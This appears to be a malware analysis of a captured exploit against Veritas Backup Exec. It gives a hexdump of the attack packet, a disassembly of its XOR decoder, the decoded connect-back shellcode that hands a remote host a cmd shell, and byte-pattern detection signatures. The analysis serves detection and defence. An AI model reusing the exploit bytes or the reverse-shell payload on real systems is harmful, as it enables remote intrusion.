port: 10000
service: Veritas Backup Exec
Reference: csni:shellcodes:konstanz:konstanz.bin
hexdump -C 62552a9adc236cee4228d0e7704797ab.bin 00000000 80 00 22 28 00 00 00 01 66 c9 34 12 00 00 00 00 |.."(....f.4.....| 00000010 00 00 09 01 00 00 00 00 00 00 00 00 00 00 00 03 |................| 00000020 00 00 02 00 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a |....ZZZZZZZZZZZZ| 00000030 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a |ZZZZZZZZZZZZZZZZ| * 00000220 5a 5a 5a 5a 00 00 20 00 59 59 59 59 59 59 59 59 |ZZZZ.. .YYYYYYYY| 00000230 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |YYYYYYYYYYYYYYYY| * 00000ed0 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 33 |YYYYYYYYYYYYYYY3| 00000ee0 c9 66 b9 05 01 e8 ff ff ff ff c1 5e 30 4c 0e 07 |.f.........^0L..| 00000ef0 e2 fa fd 68 e8 4b ed ff f8 f7 f6 6a 80 60 29 2a |...h.K.....j.`)*| 00000f00 84 55 2d 99 6f 11 6d 17 f8 93 56 02 90 43 3d 1f |.U-.o.m...V..C=.| 00000f10 f4 c3 11 6b a8 10 ae 27 c9 19 e9 b3 87 a8 ed 5a |...k...'.......Z| 00000f20 28 f1 fb 3f 32 f6 de c2 0c 6c 1d 12 4e df b6 61 |(..?2....l..N..a| 00000f30 1b 41 aa 24 c8 48 0e cd 18 54 48 a1 48 60 c6 c7 |.A.$.H...TH.H`..| 00000f40 23 74 4d 33 90 65 95 32 dc 18 69 d1 1b 50 d6 2e |#tM3.e.2..i..P..| 00000f50 43 cd ea 22 6b 3a 0d e8 29 66 85 3a 94 ba 5c b5 |C.."k:..)f.:..\.| 00000f60 09 23 17 1a 40 46 1d 01 04 4a 26 2e 84 ac 15 b5 |.#..@F...J&.....| 00000f70 92 7c ba d2 7c 52 da 0f 62 ee 08 67 83 8e d8 e4 |.|..|R..b..g....| 00000f80 8d 6f 41 fa 4a 9d 60 3b c0 67 4f c9 c8 cf ce dd |.oA.J.`;.gO.....| 00000f90 cc e3 f2 5d 73 cc 29 d9 26 a4 cf c2 ac d3 cb fd |...]s.).&.......| 00000fa0 26 51 24 da 5f 4d 1f d6 e0 47 6f d0 ab ed e8 41 |&Q$._M...Go....A| 00000fb0 6f a6 ab a6 a5 ac a6 ab ad 98 90 e3 07 45 2a a4 |o............E*.| 00000fc0 8b 59 33 e3 13 27 7f 43 5e 25 27 98 f6 22 9f f2 |.Y3..'.C^%'.."..| 00000fd0 52 9a d9 49 48 4f 8d 94 19 5b ff 15 9e c4 12 38 |R..IHO...[.....8| 00000fe0 b4 a7 a3 a3 a2 a5 9f f7 a6 a9 ac ab 04 2c 95 11 |.............,..| 00000ff0 31 e0 61 51 fc d2 fa d6 eb 06 59 59 b0 61 42 01 |1.aQ......YY.aB.| 00001000 e9 f3 fb ff ff 59 59 59 59 59 59 59 59 
59 59 59 |.....YYYYYYYYYYY| 00001010 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |YYYYYYYYYYYYYYYY| * 000013d0 59 59 59 59 eb 06 59 59 d5 f8 40 01 e9 17 f8 ff |YYYY..YY..@.....| 000013e0 ff 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |.YYYYYYYYYYYYYYY| 000013f0 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |YYYYYYYYYYYYYYYY| * 00002220 59 59 59 59 59 59 59 59 00 00 00 04 |YYYYYYYY....| 0000222c
Found konstanzbot XOR decoder, payload is 0x0106 bytes long. =------------------[ hexdump(0x1c18b5b0 , 0x00000106) ]-------------------= 0x0000 fc 6a eb 4f e8 f9 ff ff ff 60 8b 6c 24 24 8b 45 .j.O.... .`.l$$.E 0x0010 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb e3 <.|.x... O.._ ... 0x0020 30 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 c1 0I.4...1 .....t.. 0x0030 ca 0d 01 c2 eb f4 3b 54 24 28 75 e3 8b 5f 24 01 ......;T $(u.._$. 0x0040 eb 66 8b 0c 4b 8b 5f 1c 01 eb 03 2c 8b 89 6c 24 .f..K._. ...,..l$ 0x0050 1c 61 c3 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad .a.1.d.@ 0.@..p.. 0x0060 8b 40 08 5e 68 8e 4e 0e ec 50 ff d6 31 db 66 53 .@.^h.N. .P..1.fS 0x0070 66 68 33 32 68 77 73 32 5f 54 ff d0 68 cb ed fc fh32hws2 _T..h... 0x0080 3b 50 ff d6 5f 89 e5 66 81 ed 08 02 55 6a 02 ff ;P.._..f ....Uj.. 0x0090 d0 68 d9 09 f5 ad 57 ff d6 53 53 53 53 43 53 43 .h....W. .SSSSCSC 0x00a0 53 ff d0 68 8c 7f 81 0c 66 68 07 7f 66 53 89 e1 S..h.... fh..fS.. 0x00b0 95 68 ec f9 aa 60 57 ff d6 6a 10 51 55 ff d0 66 .h...`W. .j.QU..f 0x00c0 6a 64 66 68 63 6d 6a 50 59 29 cc 89 e7 6a 44 89 jdfhcmjP Y)...jD. 0x00d0 e2 31 c0 f3 aa 95 89 fd fe 42 2d fe 42 2c 8d 7a .1...... .B-.B,.z 0x00e0 38 ab ab ab 68 72 fe b3 16 ff 75 28 ff d6 5b 57 8...hr.. ..u(..[W 0x00f0 52 51 51 51 6a 01 51 51 55 51 ff d0 68 ef ce e0 RQQQj.QQ UQ..h... 0x0100 60 53 ff d6 ff d0 `S.... =-------------------------------------------------------------------------=
Using Konstanz-XOR
; Konstanz XOR decoder stub as found at 00402003 (OllyDbg listing, one
; instruction per line).  The call at 00402007 targets its own last immediate
; byte (ff), which re-decodes as "inc ecx", and the return address it leaves
; on the stack is popped into esi so the stub can locate itself.  Each payload
; byte is then XORed with its own index (cl), i.e. a per-byte key rather than
; a fixed one.  mov cx,105 followed by inc ecx gives 0x106 loop iterations,
; matching the 0x0106-byte payload reported above.
00402003 66:b9 0501      mov cx,105                        ; loop count = payload length - 1 (the "(..)" capture in the signature below)
00402007 e8 ffffffff     call konstanz.0040200b            ; pushes 0040200c, lands on the trailing ff
0040200b (ff)c1          inc ecx                           ; note: ff in parenthesis overlaps with previous instruction!
0040200d 5e              pop esi                           ; esi = 0040200c (self-locating)
0040200e 304c0e 07       xor byte ptr ds:[esi+ecx+7],cl    ; xor key is index
00402012 ^e2 fa          loopd short konstanz.0040200e     ; ecx runs 0x106 down to 1 -> decodes 00402014..00402119
Payload: connect-back CreateProcess shellcode.
; Decoded Konstanz payload (0x106 bytes starting at 00402014), OllyDbg listing
; reflowed to one instruction per line.
; Layout: 00402014 entry trampoline -> 00402067 main body; 0040201d is a
; hash-based export resolver reached through esi (args pushed: module base,
; name hash; result returned in eax, args left on the stack).
; Register roles in the body: esi = resolver, eax = last resolved function,
; edi = ws2_32 module handle, ebx = 0, later 2.
00402014 fc              cld
00402015 6a eb           push -15                              ; the eb at 00402016 also decodes as "jmp short 00402067" (eb 4f)
00402017 4f              dec edi                               ; 4f is that jmp's displacement when entered at 00402016
00402018 e8 f9ffffff     call konstanz.00402016                ; pushes 0040201d (resolver address), then jumps to 00402067
0040201d 60              pushad                                ; hash & check (edx) -- resolver entry: [esp+24] = module base, [esp+28] = hash
0040201e 8b6c24 24       mov ebp,dword ptr ss:[esp+24]         ; ebp = module base
00402022 8b45 3c         mov eax,dword ptr ss:[ebp+3c]         ; e_lfanew
00402025 8b7c05 78       mov edi,dword ptr ss:[ebp+eax+78]     ; export directory RVA
00402029 01ef            add edi,ebp                           ; edi = IMAGE_EXPORT_DIRECTORY
0040202b 8b4f 18         mov ecx,dword ptr ds:[edi+18]         ; NumberOfNames
0040202e 8b5f 20         mov ebx,dword ptr ds:[edi+20]         ; AddressOfNames RVA
00402031 01eb            add ebx,ebp
00402033 e3 30           jecxz short konstanz.00402065         ; no names left: return with eax unchanged
00402035 49              dec ecx                               ; scan names from the last one downwards
00402036 8b348b          mov esi,dword ptr ds:[ebx+ecx*4]
00402039 01ee            add esi,ebp                           ; esi = export name string
0040203b 31c0            xor eax,eax
0040203d 99              cdq                                   ; edx = running hash = 0
0040203e ac              lods byte ptr ds:[esi]
0040203f 84c0            test al,al
00402041 74 07           je short konstanz.0040204a            ; end of name
00402043 c1ca 0d         ror edx,0d                            ; ror13-add hash over the name bytes
00402046 01c2            add edx,eax
00402048 ^eb f4          jmp short konstanz.0040203e
0040204a 3b5424 28       cmp edx,dword ptr ss:[esp+28]         ; found hash?
0040204e ^75 e3          jnz short konstanz.00402033           ; no: next name
00402050 8b5f 24         mov ebx,dword ptr ds:[edi+24]         ; edx: hash -- AddressOfNameOrdinals RVA
00402053 01eb            add ebx,ebp
00402055 66:8b0c4b       mov cx,word ptr ds:[ebx+ecx*2]        ; ordinal for this name index
00402059 8b5f 1c         mov ebx,dword ptr ds:[edi+1c]         ; AddressOfFunctions RVA
0040205c 01eb            add ebx,ebp
0040205e 032c8b          add ebp,dword ptr ds:[ebx+ecx*4]      ; ebp = base + function RVA
00402061 896c24 1c       mov dword ptr ss:[esp+1c],ebp         ; ebp: addr -- overwrites the eax slot saved by pushad
00402065 61              popad
00402066 c3              retn                                  ; eax: addr -- plain retn, so both args stay on the caller's stack
00402067 31c0            xor eax,eax                           ; ----------------------- main body
00402069 64:8b40 30      mov eax,dword ptr fs:[eax+30]         ; PEB
0040206d 8b40 0c         mov eax,dword ptr ds:[eax+c]          ; PEB->Ldr
00402070 8b70 1c         mov esi,dword ptr ds:[eax+1c]         ; Ldr->InInitializationOrderModuleList.Flink
00402073 ad              lods dword ptr ds:[esi]               ; advance one entry
00402074 8b40 08         mov eax,dword ptr ds:[eax+8]          ; DllBase of that entry (kernel32 on pre-Vista Windows -- OS-version dependent, verify)
00402077 5e              pop esi                               ; esi = 0040201d, the resolver (return address pushed at 00402018)
00402078 68 8e4e0eec     push ec0e4e8e                         ; fn-hash
0040207d 50              push eax                              ; kernel32 base; this slot is read again at 004020fd
0040207e ffd6            call esi                              ; find fn
00402080 31db            xor ebx,ebx
00402082 66:53           push bx                               ; builds "ws2_32\0\0" on the stack
00402084 66:68 3332      push 3233
00402088 68 7773325f     push 5f327377
0040208d 54              push esp                              ; lpLibFileName
0040208e ffd0            call eax                              ; loadlibrary()
00402090 68 cbedfc3b     push 3bfcedcb
00402095 50              push eax                              ; ws2_32 module handle
00402096 ffd6            call esi
00402098 5f              pop edi                               ; edi = ws2_32 handle (the arg pushed at 00402095)
00402099 89e5            mov ebp,esp
0040209b 66:81ed 0802    sub bp,208                            ; ebp = esp-0x208: scratch area passed as lpWSAData
004020a0 55              push ebp                              ; lpWSAData
004020a1 6a 02           push 2                                ; wVersionRequested
004020a3 ffd0            call eax                              ; wsastartup()
004020a5 68 d909f5ad     push adf509d9
004020aa 57              push edi
004020ab ffd6            call esi
004020ad 53              push ebx                              ; dwFlags = 0
004020ae 53              push ebx                              ; g = 0
004020af 53              push ebx                              ; lpProtocolInfo = 0
004020b0 53              push ebx                              ; protocol = 0
004020b1 43              inc ebx
004020b2 53              push ebx                              ; type = 1 (SOCK_STREAM)
004020b3 43              inc ebx
004020b4 53              push ebx                              ; af = 2 (AF_INET); ebx stays 2 from here on
004020b5 ffd0            call eax                              ; wsasocket()
004020b7 68 8c7f810c     push 0c817f8c                         ; ip -- sin_addr, 4 bytes exactly as stored in memory
004020bc 66:68 077f      push 7f07                             ; port -- sin_port, 2 bytes exactly as stored
004020c0 66:53           push bx                               ; sin_family = 2; these 8 bytes form the sockaddr_in head
004020c2 89e1            mov ecx,esp                           ; ecx = &sockaddr
004020c4 95              xchg eax,ebp                          ; ebp = socket
004020c5 68 ecf9aa60     push 60aaf9ec
004020ca 57              push edi
004020cb ffd6            call esi
004020cd 6a 10           push 10                               ; len
004020cf 51              push ecx                              ; *sockaddr
004020d0 55              push ebp                              ; sock
004020d1 ffd0            call eax                              ; connect()
004020d3 66:6a 64        push 64                               ; "cmd\0" built on the stack ("d\0" first, then "cm")
004020d6 66:68 636d      push 6d63
004020da 6a 50           push 50
004020dc 59              pop ecx                               ; ecx = 0x50
004020dd 29cc            sub esp,ecx                           ; reserve 0x50 bytes for STARTUPINFO + PROCESS_INFORMATION
004020df 89e7            mov edi,esp
004020e1 6a 44           push 44                               ; STARTUPINFO.cb = 0x44
004020e3 89e2            mov edx,esp                           ; edx = &STARTUPINFO
004020e5 31c0            xor eax,eax
004020e7 f3:aa           rep stos byte ptr es:[edi]            ; zero the reserved area; leaves ecx = 0, reused as NULL below
004020e9 95              xchg eax,ebp                          ; eax = socket
004020ea 89fd            mov ebp,edi                           ; ebp = &"cmd" (edi appears to stop just below the string -- verify)
004020ec fe42 2d         inc byte ptr ds:[edx+2d]              ; dwFlags |= 0x100 (STARTF_USESTDHANDLES)
004020ef fe42 2c         inc byte ptr ds:[edx+2c]              ; dwFlags |= 0x1 (STARTF_USESHOWWINDOW)
004020f2 8d7a 38         lea edi,dword ptr ds:[edx+38]         ; &hStdInput
004020f5 ab              stos dword ptr es:[edi]               ; hStdInput = socket
004020f6 ab              stos dword ptr es:[edi]               ; hStdOutput = socket
004020f7 ab              stos dword ptr es:[edi]               ; hStdError = socket
004020f8 68 72feb316     push 16b3fe72
004020fd ff75 28         push dword ptr ss:[ebp+28]            ; re-reads the kernel32 base pushed at 0040207d (by stack-layout trace -- verify)
00402100 ffd6            call esi
00402102 5b              pop ebx                               ; ebx = kernel32 base (that same arg)
00402103 57              push edi                              ; lpProcessInformation (directly after STARTUPINFO)
00402104 52              push edx                              ; lpStartupInfo
00402105 51              push ecx                              ; lpCurrentDirectory = NULL
00402106 51              push ecx                              ; lpEnvironment = NULL
00402107 51              push ecx                              ; dwCreationFlags = 0
00402108 6a 01           push 1                                ; bInheritHandles = TRUE, so the socket handles reach the child
0040210a 51              push ecx                              ; lpThreadAttributes = NULL
0040210b 51              push ecx                              ; lpProcessAttributes = NULL
0040210c 55              push ebp                              ; lpCommandLine = "cmd"
0040210d 51              push ecx                              ; lpApplicationName = NULL
0040210e ffd0            call eax                              ; createprocess()
00402110 68 efcee060     push 60e0ceef
00402115 53              push ebx
00402116 ffd6            call esi
00402118 ffd0            call eax                              ; exitthread()
/* Detection signature for the Konstanz XOR decoder stub (listing above,
 * 00402001-00402013): xor ecx,ecx ; mov cx,<len> ; call to its own last
 * immediate byte (ff = inc ecx) ; pop esi ; xor [esi+ecx+7],cl ; loopd.
 * The single capture group is the little-endian 16-bit immediate of
 * "mov cx" (0x0105 in this sample); because the stub then executes
 * "inc ecx", the decoded payload is one byte longer (0x0106, as reported
 * above).  The doubled backslashes presumably keep the "\x.." escapes for
 * a runtime regex engine rather than the C compiler -- confirm against the
 * matcher that consumes this string. */
const char *pattern = "\\x33\\xC9\\x66\\xB9(..)\\xE8\\xFF\\xFF\\xFF\\xFF\\xC1\\x5E\\x30\\x4C\\x0E\\x07\\xE2\\xFA";
; Excerpt of the connect-back setup (004020b5-004020d1) that the signature
; below matches: every byte in this range is fixed except the 4-byte address
; and 2-byte port immediates, which the signature captures.
004020b5 ffd0            call eax                              ; wsasocket()
004020b7 68 8c7f810c     push 0c817f8c                         ; ip -- sin_addr, 4 bytes exactly as stored in memory
004020bc 66:68 077f      push 7f07                             ; port -- sin_port, 2 bytes exactly as stored
004020c0 66:53           push bx                               ; sin_family (bx = 2 at this point, see inc ebx above)
004020c2 89e1            mov ecx,esp                           ; ecx = &sockaddr
004020c4 95              xchg eax,ebp                          ; ebp = socket
004020c5 68 ecf9aa60     push 60aaf9ec                         ; hash for the resolver
004020ca 57              push edi                              ; edi = ws2_32 module handle (pop edi at 00402098)
004020cb ffd6            call esi                              ; resolver -> eax
004020cd 6a 10           push 10                               ; len
004020cf 51              push ecx                              ; *sockaddr
004020d0 55              push ebp                              ; sock
004020d1 ffd0            call eax                              ; connect()
/* Detection signature for the connect-back setup (listing above,
 * 004020b5-004020d1): call eax ; push <ip> ; push <port> ; push bx ;
 * mov ecx,esp ; xchg eax,ebp ; push <hash> ; push edi ; call esi ;
 * push 10 ; push ecx ; push ebp ; call eax.
 * Capture 1 is the 4-byte sin_addr and capture 2 the 2-byte sin_port,
 * both in the order they are pushed (sockaddr_in memory layout), so the
 * extracted values identify the callback endpoint of a given sample.
 * The doubled backslashes presumably keep the "\x.." escapes for a runtime
 * regex engine rather than the C compiler -- confirm against the matcher
 * that consumes this string. */
const char *pattern = "\\xff\\xd0\\x68(....)\\x66\\x68(..)\\x66\\x53\\x89" "\\xe1\\x95\\x68\\xec\\xf9\\xaa\\x60\\x57\\xff\\xd6" "\\x6a\\x10\\x51\\x55\\xff\\xd0";